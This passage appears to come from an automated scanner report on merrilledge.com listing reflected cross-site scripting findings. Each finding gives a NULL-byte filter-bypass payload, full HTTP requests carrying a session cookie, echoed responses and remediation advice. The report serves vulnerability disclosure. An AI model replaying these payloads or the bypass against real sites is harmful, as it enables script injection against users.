GET /m/pages/documents-forms.aspx?%009f001"><script>alert(1)</script>97152d333d=1 HTTP/1.1 Host: www.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: pxs=F05EFCF5-9B2D-479B-B538-321495B87218; SMIDENTITY=v52Qt308UD1a2quLUSvZEH3VpNOZrVki4Tgn7eb9/zpMf4owJ6F6eCR0dcQmF4mUgkb8nprUJ6YN6gJ4G4fg5DTu2sMKTW34NwlUlqrUNKjYwnU5ZEU2N846eswBPw2P/0ecTaZl+HlLhGiUoAn3xmZOZj5LtNCR8NZ06F0Bgzgq1IvIg831q3QnnDX3iA0EC4H13Sfm+VHP409ES+5Nuo/i2Lz6HGDSrOKoxbCw9QBr2KMfU53oT3FhRoOzJLMlbsRlyu3W1xlYRWs2d2ul3pGIBPD2dYHN683ehSMeuKNAjD8nszjctRcWvJXe6gICFE8aguanDD997fpt3x8vBr1VuMhTcqGoU0Ux8IsE2FtQ2gEMpMEXPW+DXuQkn7TCixNe7LcdPy4m1Ie0FxW/FdbtphDkh4Zl2uO6YpNUHlaz9k7uqUJGdrdm4qJAZCh132bYeebO2kJuOptF+mjFMJGrceyisyHj308DUd+AAOO8XgCglPEP5oq5aISb051KHZRy6qyuW/egypwYiFDvjiYbFreCmzFrj4JxwJG2+gGWqH29gbMNJkLS9qMCu9bz15Rav9t94kZOlDRqnZmvtBC9bhdftfVCpQpfS61mMmLBxhs4CYuJKSrbGEevugDg; pxv=5AA68BA2-39A2-44FF-8763-B60C8B7FDDBF; CMAVID=none; cmTPSet=Y;
Response
HTTP/1.1 200 OK Date: Wed, 24 Nov 2010 21:01:04 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 51653
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><!-- Thank you for using ...[SNIP]... <a href="../System/SearchResults.aspx?.9f001"><script>alert(1)</script>97152d333d=1&k=" id="ctl00_ECMSSearchTextBox1_srchAnchor1" class="btn" onclick="return objSearchWidgetLibrary.onsearchclick1('ctl00_ECMSSearchTextBox1_srcText','ctl00_ECMSSearchTextBox1_srchAnchor1')"> ...[SNIP]...
2.42. http://www.merrilledge.com/m/pages/general-investing.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.merrilledge.com
Path:
/m/pages/general-investing.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00e3d12"><script>alert(1)</script>d670c597b6b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e3d12"><script>alert(1)</script>d670c597b6b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /m/pages/general-investing.aspx?%00e3d12"><script>alert(1)</script>d670c597b6b=1 HTTP/1.1 Host: www.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: pxs=F05EFCF5-9B2D-479B-B538-321495B87218; SMIDENTITY=v52Qt308UD1a2quLUSvZEH3VpNOZrVki4Tgn7eb9/zpMf4owJ6F6eCR0dcQmF4mUgkb8nprUJ6YN6gJ4G4fg5DTu2sMKTW34NwlUlqrUNKjYwnU5ZEU2N846eswBPw2P/0ecTaZl+HlLhGiUoAn3xmZOZj5LtNCR8NZ06F0Bgzgq1IvIg831q3QnnDX3iA0EC4H13Sfm+VHP409ES+5Nuo/i2Lz6HGDSrOKoxbCw9QBr2KMfU53oT3FhRoOzJLMlbsRlyu3W1xlYRWs2d2ul3pGIBPD2dYHN683ehSMeuKNAjD8nszjctRcWvJXe6gICFE8aguanDD997fpt3x8vBr1VuMhTcqGoU0Ux8IsE2FtQ2gEMpMEXPW+DXuQkn7TCixNe7LcdPy4m1Ie0FxW/FdbtphDkh4Zl2uO6YpNUHlaz9k7uqUJGdrdm4qJAZCh132bYeebO2kJuOptF+mjFMJGrceyisyHj308DUd+AAOO8XgCglPEP5oq5aISb051KHZRy6qyuW/egypwYiFDvjiYbFreCmzFrj4JxwJG2+gGWqH29gbMNJkLS9qMCu9bz15Rav9t94kZOlDRqnZmvtBC9bhdftfVCpQpfS61mMmLBxhs4CYuJKSrbGEevugDg; pxv=5AA68BA2-39A2-44FF-8763-B60C8B7FDDBF; CMAVID=none; cmTPSet=Y;
Response
HTTP/1.1 200 OK Date: Wed, 24 Nov 2010 21:00:58 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 88717
2.43. http://www.merrilledge.com/m/pages/health-care-in-retirement.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.merrilledge.com
Path:
/m/pages/health-care-in-retirement.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %009966d"><script>alert(1)</script>828358197c9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9966d"><script>alert(1)</script>828358197c9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /m/pages/health-care-in-retirement.aspx?%009966d"><script>alert(1)</script>828358197c9=1 HTTP/1.1 Host: www.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: pxs=F05EFCF5-9B2D-479B-B538-321495B87218; SMIDENTITY=v52Qt308UD1a2quLUSvZEH3VpNOZrVki4Tgn7eb9/zpMf4owJ6F6eCR0dcQmF4mUgkb8nprUJ6YN6gJ4G4fg5DTu2sMKTW34NwlUlqrUNKjYwnU5ZEU2N846eswBPw2P/0ecTaZl+HlLhGiUoAn3xmZOZj5LtNCR8NZ06F0Bgzgq1IvIg831q3QnnDX3iA0EC4H13Sfm+VHP409ES+5Nuo/i2Lz6HGDSrOKoxbCw9QBr2KMfU53oT3FhRoOzJLMlbsRlyu3W1xlYRWs2d2ul3pGIBPD2dYHN683ehSMeuKNAjD8nszjctRcWvJXe6gICFE8aguanDD997fpt3x8vBr1VuMhTcqGoU0Ux8IsE2FtQ2gEMpMEXPW+DXuQkn7TCixNe7LcdPy4m1Ie0FxW/FdbtphDkh4Zl2uO6YpNUHlaz9k7uqUJGdrdm4qJAZCh132bYeebO2kJuOptF+mjFMJGrceyisyHj308DUd+AAOO8XgCglPEP5oq5aISb051KHZRy6qyuW/egypwYiFDvjiYbFreCmzFrj4JxwJG2+gGWqH29gbMNJkLS9qMCu9bz15Rav9t94kZOlDRqnZmvtBC9bhdftfVCpQpfS61mMmLBxhs4CYuJKSrbGEevugDg; pxv=5AA68BA2-39A2-44FF-8763-B60C8B7FDDBF; CMAVID=none; cmTPSet=Y;
Response
HTTP/1.1 200 OK Date: Wed, 24 Nov 2010 21:00:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 91834
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><title> health-care-in ...[SNIP]... <a href="../System/SearchResults.aspx?.9966d"><script>alert(1)</script>828358197c9=1&k=" id="ctl00_ECMSSearchTextBox1_srchAnchor1" class="btn" onclick="return objSearchWidgetLibrary.onsearchclick1('ctl00_ECMSSearchTextBox1_srcText','ctl00_ECMSSearchTextBox1_srchAnchor1')"> ...[SNIP]...
The value of the src_cd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %0032182'%3b7a58806a5 was submitted in the src_cd parameter. This input was echoed as 32182';7a58806a5 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /m/pages/health-care-in-retirement.aspx?src_cd=OM2%0032182'%3b7a58806a5&cm_sp=GWM-MerrillEdge-_-Oct%20Webcast-_-GZ16LT001A_mks_MLWM_RHModule_retire_webcast_post_300x134_V3 HTTP/1.1 Host: www.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: pxs=F05EFCF5-9B2D-479B-B538-321495B87218; SMIDENTITY=v52Qt308UD1a2quLUSvZEH3VpNOZrVki4Tgn7eb9/zpMf4owJ6F6eCR0dcQmF4mUgkb8nprUJ6YN6gJ4G4fg5DTu2sMKTW34NwlUlqrUNKjYwnU5ZEU2N846eswBPw2P/0ecTaZl+HlLhGiUoAn3xmZOZj5LtNCR8NZ06F0Bgzgq1IvIg831q3QnnDX3iA0EC4H13Sfm+VHP409ES+5Nuo/i2Lz6HGDSrOKoxbCw9QBr2KMfU53oT3FhRoOzJLMlbsRlyu3W1xlYRWs2d2ul3pGIBPD2dYHN683ehSMeuKNAjD8nszjctRcWvJXe6gICFE8aguanDD997fpt3x8vBr1VuMhTcqGoU0Ux8IsE2FtQ2gEMpMEXPW+DXuQkn7TCixNe7LcdPy4m1Ie0FxW/FdbtphDkh4Zl2uO6YpNUHlaz9k7uqUJGdrdm4qJAZCh132bYeebO2kJuOptF+mjFMJGrceyisyHj308DUd+AAOO8XgCglPEP5oq5aISb051KHZRy6qyuW/egypwYiFDvjiYbFreCmzFrj4JxwJG2+gGWqH29gbMNJkLS9qMCu9bz15Rav9t94kZOlDRqnZmvtBC9bhdftfVCpQpfS61mMmLBxhs4CYuJKSrbGEevugDg; pxv=5AA68BA2-39A2-44FF-8763-B60C8B7FDDBF; CMAVID=none; cmTPSet=Y;
Response
HTTP/1.1 200 OK Date: Wed, 24 Nov 2010 21:01:09 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 59313
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><!-- Thank you for using ...[SNIP]... <![CDATA[ var SPC = { 'Tactic' : 'OM2.32182';7a58806a5' ,'Page' : 'health-care-in-retirement' ,'preview' : false }; //]]> ...[SNIP]...
2.45. http://www.merrilledge.com/m/pages/merrill-edge-advisory-center.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.merrilledge.com
Path:
/m/pages/merrill-edge-advisory-center.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %005aec9"><script>alert(1)</script>4ef8a1e158a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5aec9"><script>alert(1)</script>4ef8a1e158a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /m/pages/merrill-edge-advisory-center.aspx?%005aec9"><script>alert(1)</script>4ef8a1e158a=1 HTTP/1.1 Host: www.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: pxs=F05EFCF5-9B2D-479B-B538-321495B87218; SMIDENTITY=v52Qt308UD1a2quLUSvZEH3VpNOZrVki4Tgn7eb9/zpMf4owJ6F6eCR0dcQmF4mUgkb8nprUJ6YN6gJ4G4fg5DTu2sMKTW34NwlUlqrUNKjYwnU5ZEU2N846eswBPw2P/0ecTaZl+HlLhGiUoAn3xmZOZj5LtNCR8NZ06F0Bgzgq1IvIg831q3QnnDX3iA0EC4H13Sfm+VHP409ES+5Nuo/i2Lz6HGDSrOKoxbCw9QBr2KMfU53oT3FhRoOzJLMlbsRlyu3W1xlYRWs2d2ul3pGIBPD2dYHN683ehSMeuKNAjD8nszjctRcWvJXe6gICFE8aguanDD997fpt3x8vBr1VuMhTcqGoU0Ux8IsE2FtQ2gEMpMEXPW+DXuQkn7TCixNe7LcdPy4m1Ie0FxW/FdbtphDkh4Zl2uO6YpNUHlaz9k7uqUJGdrdm4qJAZCh132bYeebO2kJuOptF+mjFMJGrceyisyHj308DUd+AAOO8XgCglPEP5oq5aISb051KHZRy6qyuW/egypwYiFDvjiYbFreCmzFrj4JxwJG2+gGWqH29gbMNJkLS9qMCu9bz15Rav9t94kZOlDRqnZmvtBC9bhdftfVCpQpfS61mMmLBxhs4CYuJKSrbGEevugDg; pxv=5AA68BA2-39A2-44FF-8763-B60C8B7FDDBF; CMAVID=none; cmTPSet=Y;
Response
HTTP/1.1 200 OK Date: Wed, 24 Nov 2010 21:00:47 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 83976
2.46. http://www.merrilledge.com/m/pages/pricing.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.merrilledge.com
Path:
/m/pages/pricing.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0064c14"><script>alert(1)</script>4575fdadaf6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 64c14"><script>alert(1)</script>4575fdadaf6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /m/pages/pricing.aspx?%0064c14"><script>alert(1)</script>4575fdadaf6=1 HTTP/1.1 Host: www.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: pxs=F05EFCF5-9B2D-479B-B538-321495B87218; SMIDENTITY=v52Qt308UD1a2quLUSvZEH3VpNOZrVki4Tgn7eb9/zpMf4owJ6F6eCR0dcQmF4mUgkb8nprUJ6YN6gJ4G4fg5DTu2sMKTW34NwlUlqrUNKjYwnU5ZEU2N846eswBPw2P/0ecTaZl+HlLhGiUoAn3xmZOZj5LtNCR8NZ06F0Bgzgq1IvIg831q3QnnDX3iA0EC4H13Sfm+VHP409ES+5Nuo/i2Lz6HGDSrOKoxbCw9QBr2KMfU53oT3FhRoOzJLMlbsRlyu3W1xlYRWs2d2ul3pGIBPD2dYHN683ehSMeuKNAjD8nszjctRcWvJXe6gICFE8aguanDD997fpt3x8vBr1VuMhTcqGoU0Ux8IsE2FtQ2gEMpMEXPW+DXuQkn7TCixNe7LcdPy4m1Ie0FxW/FdbtphDkh4Zl2uO6YpNUHlaz9k7uqUJGdrdm4qJAZCh132bYeebO2kJuOptF+mjFMJGrceyisyHj308DUd+AAOO8XgCglPEP5oq5aISb051KHZRy6qyuW/egypwYiFDvjiYbFreCmzFrj4JxwJG2+gGWqH29gbMNJkLS9qMCu9bz15Rav9t94kZOlDRqnZmvtBC9bhdftfVCpQpfS61mMmLBxhs4CYuJKSrbGEevugDg; pxv=5AA68BA2-39A2-44FF-8763-B60C8B7FDDBF; CMAVID=none; cmTPSet=Y;
Response
HTTP/1.1 200 OK Date: Wed, 24 Nov 2010 21:01:04 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 67355
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><!-- Thank you for using ...[SNIP]... <a href="../System/SearchResults.aspx?.64c14"><script>alert(1)</script>4575fdadaf6=1&k=" id="ctl00_ECMSSearchTextBox1_srchAnchor1" class="btn" onclick="return objSearchWidgetLibrary.onsearchclick1('ctl00_ECMSSearchTextBox1_srcText','ctl00_ECMSSearchTextBox1_srchAnchor1')"> ...[SNIP]...
2.47. http://www.merrilledge.com/m/pages/products-and-solutions.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.merrilledge.com
Path:
/m/pages/products-and-solutions.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %007e7f1"><script>alert(1)</script>68fa31b9a25 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7e7f1"><script>alert(1)</script>68fa31b9a25 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /m/pages/products-and-solutions.aspx?%007e7f1"><script>alert(1)</script>68fa31b9a25=1 HTTP/1.1 Host: www.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: pxs=F05EFCF5-9B2D-479B-B538-321495B87218; SMIDENTITY=v52Qt308UD1a2quLUSvZEH3VpNOZrVki4Tgn7eb9/zpMf4owJ6F6eCR0dcQmF4mUgkb8nprUJ6YN6gJ4G4fg5DTu2sMKTW34NwlUlqrUNKjYwnU5ZEU2N846eswBPw2P/0ecTaZl+HlLhGiUoAn3xmZOZj5LtNCR8NZ06F0Bgzgq1IvIg831q3QnnDX3iA0EC4H13Sfm+VHP409ES+5Nuo/i2Lz6HGDSrOKoxbCw9QBr2KMfU53oT3FhRoOzJLMlbsRlyu3W1xlYRWs2d2ul3pGIBPD2dYHN683ehSMeuKNAjD8nszjctRcWvJXe6gICFE8aguanDD997fpt3x8vBr1VuMhTcqGoU0Ux8IsE2FtQ2gEMpMEXPW+DXuQkn7TCixNe7LcdPy4m1Ie0FxW/FdbtphDkh4Zl2uO6YpNUHlaz9k7uqUJGdrdm4qJAZCh132bYeebO2kJuOptF+mjFMJGrceyisyHj308DUd+AAOO8XgCglPEP5oq5aISb051KHZRy6qyuW/egypwYiFDvjiYbFreCmzFrj4JxwJG2+gGWqH29gbMNJkLS9qMCu9bz15Rav9t94kZOlDRqnZmvtBC9bhdftfVCpQpfS61mMmLBxhs4CYuJKSrbGEevugDg; pxv=5AA68BA2-39A2-44FF-8763-B60C8B7FDDBF; CMAVID=none; cmTPSet=Y;
Response
HTTP/1.1 200 OK Date: Wed, 24 Nov 2010 21:00:43 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 91371
2.48. http://www.merrilledge.com/m/pages/research-and-planning.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.merrilledge.com
Path:
/m/pages/research-and-planning.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %006e4ff"><script>alert(1)</script>46d3f75c65 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6e4ff"><script>alert(1)</script>46d3f75c65 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /m/pages/research-and-planning.aspx?%006e4ff"><script>alert(1)</script>46d3f75c65=1 HTTP/1.1 Host: www.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: pxs=F05EFCF5-9B2D-479B-B538-321495B87218; SMIDENTITY=v52Qt308UD1a2quLUSvZEH3VpNOZrVki4Tgn7eb9/zpMf4owJ6F6eCR0dcQmF4mUgkb8nprUJ6YN6gJ4G4fg5DTu2sMKTW34NwlUlqrUNKjYwnU5ZEU2N846eswBPw2P/0ecTaZl+HlLhGiUoAn3xmZOZj5LtNCR8NZ06F0Bgzgq1IvIg831q3QnnDX3iA0EC4H13Sfm+VHP409ES+5Nuo/i2Lz6HGDSrOKoxbCw9QBr2KMfU53oT3FhRoOzJLMlbsRlyu3W1xlYRWs2d2ul3pGIBPD2dYHN683ehSMeuKNAjD8nszjctRcWvJXe6gICFE8aguanDD997fpt3x8vBr1VuMhTcqGoU0Ux8IsE2FtQ2gEMpMEXPW+DXuQkn7TCixNe7LcdPy4m1Ie0FxW/FdbtphDkh4Zl2uO6YpNUHlaz9k7uqUJGdrdm4qJAZCh132bYeebO2kJuOptF+mjFMJGrceyisyHj308DUd+AAOO8XgCglPEP5oq5aISb051KHZRy6qyuW/egypwYiFDvjiYbFreCmzFrj4JxwJG2+gGWqH29gbMNJkLS9qMCu9bz15Rav9t94kZOlDRqnZmvtBC9bhdftfVCpQpfS61mMmLBxhs4CYuJKSrbGEevugDg; pxv=5AA68BA2-39A2-44FF-8763-B60C8B7FDDBF; CMAVID=none; cmTPSet=Y;
Response
HTTP/1.1 200 OK Date: Wed, 24 Nov 2010 21:00:45 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 83371
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><title> research-and-p ...[SNIP]... <a href="../System/SearchResults.aspx?.6e4ff"><script>alert(1)</script>46d3f75c65=1&k=" id="ctl00_ECMSSearchTextBox1_srchAnchor1" class="btn" onclick="return objSearchWidgetLibrary.onsearchclick1('ctl00_ECMSSearchTextBox1_srcText','ctl00_ECMSSearchTextBox1_srchAnchor1')"> ...[SNIP]...
2.49. http://www.merrilledge.com/m/pages/self-directed-investing.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.merrilledge.com
Path:
/m/pages/self-directed-investing.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0070b97"><script>alert(1)</script>c6cb58e5254 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 70b97"><script>alert(1)</script>c6cb58e5254 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /m/pages/self-directed-investing.aspx?%0070b97"><script>alert(1)</script>c6cb58e5254=1 HTTP/1.1 Host: www.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: pxs=F05EFCF5-9B2D-479B-B538-321495B87218; SMIDENTITY=v52Qt308UD1a2quLUSvZEH3VpNOZrVki4Tgn7eb9/zpMf4owJ6F6eCR0dcQmF4mUgkb8nprUJ6YN6gJ4G4fg5DTu2sMKTW34NwlUlqrUNKjYwnU5ZEU2N846eswBPw2P/0ecTaZl+HlLhGiUoAn3xmZOZj5LtNCR8NZ06F0Bgzgq1IvIg831q3QnnDX3iA0EC4H13Sfm+VHP409ES+5Nuo/i2Lz6HGDSrOKoxbCw9QBr2KMfU53oT3FhRoOzJLMlbsRlyu3W1xlYRWs2d2ul3pGIBPD2dYHN683ehSMeuKNAjD8nszjctRcWvJXe6gICFE8aguanDD997fpt3x8vBr1VuMhTcqGoU0Ux8IsE2FtQ2gEMpMEXPW+DXuQkn7TCixNe7LcdPy4m1Ie0FxW/FdbtphDkh4Zl2uO6YpNUHlaz9k7uqUJGdrdm4qJAZCh132bYeebO2kJuOptF+mjFMJGrceyisyHj308DUd+AAOO8XgCglPEP5oq5aISb051KHZRy6qyuW/egypwYiFDvjiYbFreCmzFrj4JxwJG2+gGWqH29gbMNJkLS9qMCu9bz15Rav9t94kZOlDRqnZmvtBC9bhdftfVCpQpfS61mMmLBxhs4CYuJKSrbGEevugDg; pxv=5AA68BA2-39A2-44FF-8763-B60C8B7FDDBF; CMAVID=none; cmTPSet=Y;
Response
HTTP/1.1 200 OK Date: Wed, 24 Nov 2010 21:00:20 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 91015
The value of the src_cd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %009496e'%3b13da8abd038 was submitted in the src_cd parameter. This input was echoed as 9496e';13da8abd038 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /m/pages/self-directed-investing.aspx?src_cd=BAC1%009496e'%3b13da8abd038 HTTP/1.1 Host: www.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: pxs=F05EFCF5-9B2D-479B-B538-321495B87218; 